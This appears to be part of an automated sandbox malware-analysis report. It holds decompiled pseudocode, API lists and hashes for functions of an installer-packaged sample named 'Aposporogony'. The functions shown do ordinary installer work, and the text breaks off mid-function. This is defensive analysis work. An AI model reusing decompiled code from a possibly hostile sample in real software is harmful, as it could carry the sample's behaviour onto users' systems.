                                                                                                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                                                                                                      • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                                                                                      • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E00402598(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                      				int _t17;
                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                      				intOrPtr* _t32;
                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t32 = __esi;
                                                                                                                                                                                      				_t24 = __ebx;
                                                                                                                                                                                      				_t14 =  *(_t35 - 0x20);
                                                                                                                                                                                      				_t38 = __edx - 0x38;
                                                                                                                                                                                      				 *(_t35 - 0x4c) = _t14;
                                                                                                                                                                                      				_t27 = 0 | _t38 == 0x00000000;
                                                                                                                                                                                      				_t29 = _t38 == 0;
                                                                                                                                                                                      				if(_t14 == __ebx) {
                                                                                                                                                                                      					if(__edx != 0x38) {
                                                                                                                                                                                      						_t17 = lstrlenW(E00402C41(0x11)) + _t16;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E00402C41(0x21);
                                                                                                                                                                                      						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                                                                                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp\System.dll");
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					E00402C1F(1);
                                                                                                                                                                                      					 *0x40add8 = __ax;
                                                                                                                                                                                      					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *(_t35 + 8) = _t17;
                                                                                                                                                                                      				if( *_t32 == _t24) {
                                                                                                                                                                                      					L13:
                                                                                                                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t34 = E00406348(_t27, _t32);
                                                                                                                                                                                      					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405FBF(_t34, _t34) >= 0) {
                                                                                                                                                                                      						_t14 = E00405F90(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsm2525.tmp\System.dll",  *(_t35 + 8));
                                                                                                                                                                                      						_t40 = _t14;
                                                                                                                                                                                      						if(_t40 == 0) {
                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x00402598
                                                                                                                                                                                      0x00402598
                                                                                                                                                                                      0x00402598
                                                                                                                                                                                      0x0040259d
                                                                                                                                                                                      0x004025a0
                                                                                                                                                                                      0x004025a3
                                                                                                                                                                                      0x004025a8
                                                                                                                                                                                      0x004025aa
                                                                                                                                                                                      0x004025ca
                                                                                                                                                                                      0x00402608
                                                                                                                                                                                      0x004025cc
                                                                                                                                                                                      0x004025ce
                                                                                                                                                                                      0x004025e8
                                                                                                                                                                                      0x004025f3
                                                                                                                                                                                      0x004025f3
                                                                                                                                                                                      0x004025ac
                                                                                                                                                                                      0x004025ae
                                                                                                                                                                                      0x004025b3
                                                                                                                                                                                      0x004025c1
                                                                                                                                                                                      0x004025c4
                                                                                                                                                                                      0x0040260d
                                                                                                                                                                                      0x00402610
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402616
                                                                                                                                                                                      0x0040261f
                                                                                                                                                                                      0x00402621
                                                                                                                                                                                      0x00402640
                                                                                                                                                                                      0x004015b4
                                                                                                                                                                                      0x004015b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004015bc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00402621
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsm2525.tmp$C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll
                                                                                                                                                                                      • API String ID: 3109718747-2917820168
                                                                                                                                                                                      • Opcode ID: f4fa1011bd4008ae9725170778ac653c57841fb519ff94b3c5434bb0c1a66890
                                                                                                                                                                                      • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f4fa1011bd4008ae9725170778ac653c57841fb519ff94b3c5434bb0c1a66890
                                                                                                                                                                                      • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                      			E73D22398(void* __edx) {
                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                      				signed char* _t42;
                                                                                                                                                                                      				signed char* _t51;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      
                                                                                                                                                                                      				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                                                                                                                                      					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                                                                                                                                      					_t52 = _t51[0x18];
                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t41 = 0x1a;
                                                                                                                                                                                      					if(_t52 == _t41) {
                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t52 != 0xffffffff) {
                                                                                                                                                                                      						if(_t52 <= 0 || _t52 > 0x19) {
                                                                                                                                                                                      							_t51[0x18] = _t41;
                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t37 = E73D212BA(_t52 - 1);
                                                                                                                                                                                      							L10:
                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t37 = E73D21243();
                                                                                                                                                                                      						L11:
                                                                                                                                                                                      						_t52 = _t37;
                                                                                                                                                                                      						L12:
                                                                                                                                                                                      						_t13 =  &(_t51[8]); // 0x1020
                                                                                                                                                                                      						_t42 = _t13;
                                                                                                                                                                                      						if(_t51[4] >= 0) {
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t38 =  *_t51 & 0x000000ff;
                                                                                                                                                                                      						_t51[0x1c] = 0;
                                                                                                                                                                                      						if(_t38 > 7) {
                                                                                                                                                                                      							L27:
                                                                                                                                                                                      							_t39 = GlobalFree(_t52);
                                                                                                                                                                                      							if( *(_t54 + 0x10) == 0) {
                                                                                                                                                                                      								return _t39;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                                                                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							switch( *((intOrPtr*)(_t38 * 4 +  &M73D22510))) {
                                                                                                                                                                                      								case 0:
                                                                                                                                                                                      									 *_t42 = 0;
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 1:
                                                                                                                                                                                      									__eax = E73D21311(__ebp);
                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                      								case 2:
                                                                                                                                                                                      									 *__edi = E73D21311(__ebp);
                                                                                                                                                                                      									__edi[1] = __edx;
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 3:
                                                                                                                                                                                      									__eax = GlobalAlloc(0x40,  *0x73d2406c);
                                                                                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                                                                                      									__edx = 0;
                                                                                                                                                                                      									 *__edi = __eax;
                                                                                                                                                                                      									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x73d2406c, __eax,  *0x73d2406c, 0, 0);
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 4:
                                                                                                                                                                                      									__eax = E73D2122C(__ebp);
                                                                                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                                                                                      									L21:
                                                                                                                                                                                      									 *__edi = __eax;
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 5:
                                                                                                                                                                                      									__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                                                                                      									_push(__eax);
                                                                                                                                                                                      									 *(__esi + 0x1c) = __eax;
                                                                                                                                                                                      									_push(__ebp);
                                                                                                                                                                                      									 *__edi = __eax;
                                                                                                                                                                                      									__imp__CLSIDFromString();
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 6:
                                                                                                                                                                                      									if( *__ebp != __cx) {
                                                                                                                                                                                      										__eax = E73D21311(__ebp);
                                                                                                                                                                                      										 *__ebx = __eax;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								case 7:
                                                                                                                                                                                      									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                                                                                                                                      									( *(__esi + 0x18) - 1) *  *0x73d2406c =  *0x73d24074 + ( *(__esi + 0x18) - 1) *  *0x73d2406c * 2 + 0x18;
                                                                                                                                                                                      									 *__ebx =  *0x73d24074 + ( *(__esi + 0x18) - 1) *  *0x73d2406c * 2 + 0x18;
                                                                                                                                                                                      									asm("cdq");
                                                                                                                                                                                      									__eax = E73D21470(__edx,  *0x73d24074 + ( *(__esi + 0x18) - 1) *  *0x73d2406c * 2 + 0x18, __edx,  *0x73d24074 + ( *(__esi + 0x18) - 1) *  *0x73d2406c * 2);
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L9:
                                                                                                                                                                                      					_t37 = E73D2122C(0x73d24044);
                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x73d223ac
                                                                                                                                                                                      0x73d223b0
                                                                                                                                                                                      0x73d223bb
                                                                                                                                                                                      0x73d223bb
                                                                                                                                                                                      0x73d223c2
                                                                                                                                                                                      0x73d223c7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d223cb
                                                                                                                                                                                      0x73d223ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d223d3
                                                                                                                                                                                      0x73d223de
                                                                                                                                                                                      0x73d223ee
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d223e5
                                                                                                                                                                                      0x73d223e7
                                                                                                                                                                                      0x73d223fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d223fd
                                                                                                                                                                                      0x73d223d5
                                                                                                                                                                                      0x73d223d5
                                                                                                                                                                                      0x73d223fe
                                                                                                                                                                                      0x73d223fe
                                                                                                                                                                                      0x73d22400
                                                                                                                                                                                      0x73d22404
                                                                                                                                                                                      0x73d22404
                                                                                                                                                                                      0x73d22407
                                                                                                                                                                                      0x73d22407
                                                                                                                                                                                      0x73d2240f
                                                                                                                                                                                      0x73d22417
                                                                                                                                                                                      0x73d2241a
                                                                                                                                                                                      0x73d224d9
                                                                                                                                                                                      0x73d224da
                                                                                                                                                                                      0x73d224e5
                                                                                                                                                                                      0x73d2250f
                                                                                                                                                                                      0x73d2250f
                                                                                                                                                                                      0x73d224f5
                                                                                                                                                                                      0x73d22501
                                                                                                                                                                                      0x73d224f7
                                                                                                                                                                                      0x73d224f7
                                                                                                                                                                                      0x73d224f7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22420
                                                                                                                                                                                      0x73d22420
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22427
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2242f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d2243d
                                                                                                                                                                                      0x73d2243f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22460
                                                                                                                                                                                      0x73d22466
                                                                                                                                                                                      0x73d22469
                                                                                                                                                                                      0x73d2246b
                                                                                                                                                                                      0x73d2247b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22448
                                                                                                                                                                                      0x73d2244d
                                                                                                                                                                                      0x73d22450
                                                                                                                                                                                      0x73d22451
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22487
                                                                                                                                                                                      0x73d2248d
                                                                                                                                                                                      0x73d2248e
                                                                                                                                                                                      0x73d22491
                                                                                                                                                                                      0x73d22492
                                                                                                                                                                                      0x73d22494
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d224a0
                                                                                                                                                                                      0x73d224a3
                                                                                                                                                                                      0x73d224af
                                                                                                                                                                                      0x73d224b1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d224bd
                                                                                                                                                                                      0x73d224c9
                                                                                                                                                                                      0x73d224cc
                                                                                                                                                                                      0x73d224ce
                                                                                                                                                                                      0x73d224d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d22420
                                                                                                                                                                                      0x73d2241a
                                                                                                                                                                                      0x73d223f3
                                                                                                                                                                                      0x73d223f8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d223f8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D224DA
                                                                                                                                                                                        • Part of subcall function 73D2122C: lstrcpynW.KERNEL32(00000000,?,73D212DF,00000019,73D211BE,-000000A0), ref: 73D2123C
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 73D22460
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73D2247B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4216380887-0
                                                                                                                                                                                      • Opcode ID: be0d818fafe58fe39479c3a05990a013939e3fbe897391d2ec0d3d92c2b0e44b
                                                                                                                                                                                      • Instruction ID: 35c46ed386d4ca8cda36058ec7380219e7f614941c137b1a766002edce557d05
                                                                                                                                                                                      • Opcode Fuzzy Hash: be0d818fafe58fe39479c3a05990a013939e3fbe897391d2ec0d3d92c2b0e44b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D41E1B2404309EFD3609F30D844B267FB8FBA432AB10891DF48AE7585E735A586CB61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E73D21621(struct HINSTANCE__* _a4, short* _a8) {
                                                                                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                                      				_t10 = GlobalAlloc(0x40, _t14);
                                                                                                                                                                                      				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                                                                                                                                      				_t7 = GetProcAddress(_a4, _t10);
                                                                                                                                                                                      				GlobalFree(_t10);
                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                      			}






                                                                                                                                                                                      0x73d2163b
                                                                                                                                                                                      0x73d21647
                                                                                                                                                                                      0x73d21654
                                                                                                                                                                                      0x73d2165b
                                                                                                                                                                                      0x73d21664
                                                                                                                                                                                      0x73d21670

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73D221F0,?,00000808), ref: 73D21639
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73D221F0,?,00000808), ref: 73D21640
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73D221F0,?,00000808), ref: 73D21654
                                                                                                                                                                                      • GetProcAddress.KERNEL32(73D221F0,00000000), ref: 73D2165B
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D21664
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1148316912-0
                                                                                                                                                                                      • Opcode ID: d0cc76c6bf96b597701ee742ff0877b89a812730a3b69f88a86fa150535cb30e
                                                                                                                                                                                      • Instruction ID: 75bcc9d75b0beb2fc4e60e02da1efbf345904b818cbbec01092631fb8a36ff41
                                                                                                                                                                                      • Opcode Fuzzy Hash: d0cc76c6bf96b597701ee742ff0877b89a812730a3b69f88a86fa150535cb30e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F01C732061387BD6202AA78D4CD9BBE9CDF9B2F5B210211F66C9219186A28C11DBF5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00401D5D() {
                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                      				struct HINSTANCE__* _t22;
                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                                                                                                                                      				GetClientRect(_t25, _t27 - 0x58);
                                                                                                                                                                                      				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C41(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                                                                                                                                      				if(_t18 != _t22) {
                                                                                                                                                                                      					DeleteObject(_t18);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t27 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x00401d69
                                                                                                                                                                                      0x00401d70
                                                                                                                                                                                      0x00401d9f
                                                                                                                                                                                      0x00401da7
                                                                                                                                                                                      0x00401dae
                                                                                                                                                                                      0x00401dae
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                      • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                                      			E00401C1F(intOrPtr __edx) {
                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                      				long _t30;
                                                                                                                                                                                      				signed int _t32;
                                                                                                                                                                                      				WCHAR* _t35;
                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                      				int _t41;
                                                                                                                                                                                      				signed int _t42;
                                                                                                                                                                                      				int _t46;
                                                                                                                                                                                      				int _t56;
                                                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                                                      				struct HWND__* _t61;
                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t57 = __edx;
                                                                                                                                                                                      				_t29 = E00402C1F(3);
                                                                                                                                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                                                                                      				 *(_t64 - 0x10) = _t29;
                                                                                                                                                                                      				_t30 = E00402C1F(4);
                                                                                                                                                                                      				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                                                                                                                                      				 *(_t64 + 8) = _t30;
                                                                                                                                                                                      				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
